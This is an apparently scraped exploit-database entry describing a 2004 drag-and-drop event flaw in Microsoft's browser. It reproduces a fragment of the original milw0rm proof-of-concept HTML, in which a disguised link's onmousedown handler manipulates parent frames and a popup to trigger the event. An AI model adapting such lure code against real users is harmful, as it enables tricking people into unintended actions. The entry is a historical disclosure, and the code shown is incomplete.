Drag and Drop Event Vulnerability

vendor:

Unknown

by:

milw0rm.com

5.5

CVSS

MEDIUM

Drag and Drop Event

Unknown

CWE

Product Name: Unknown

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Unknown

2004

Drag and Drop Event Vulnerability

This is the 3rd version of the vulnerability where a drag and drop event can be caused by clicking a specific link on a popup that points to 'The Better Browser' website. The exploit code is provided in the given HTML code.

Mitigation:

To mitigate this vulnerability, users should avoid clicking on suspicious links and should keep their software up to date with the latest patches and updates.

Source

Exploit-DB raw data:

Example:

   Alright microsoft. Get your act together. Seriously, this is the 3rd version of this
   vulnerability and we can still cause a drag and drop event.
   Well anyway, to the people that don't design easily exploited software, simply click the link
   on the popup that points to 'The Better Browser' (Hmm, wonder what that could be...) to cause
   a drag and drop event and add it to your favorites. <html> <body> <table width="100%"
   height="100%" border=3><tr><td valign=top> <br><center> Click this link: <a
   href="http://www.mozilla.org/products/firefox/" id=anch
   onmousedown="parent.nsc.style.width=2000;parent.nsc.style.height=2000;parent.pop.show(1,1,1,1
   );parent.setTimeout('showalert()',3000);">The <i>Better</i> Browser</a> </td></tr></table>

# milw0rm.com [2004-07-13]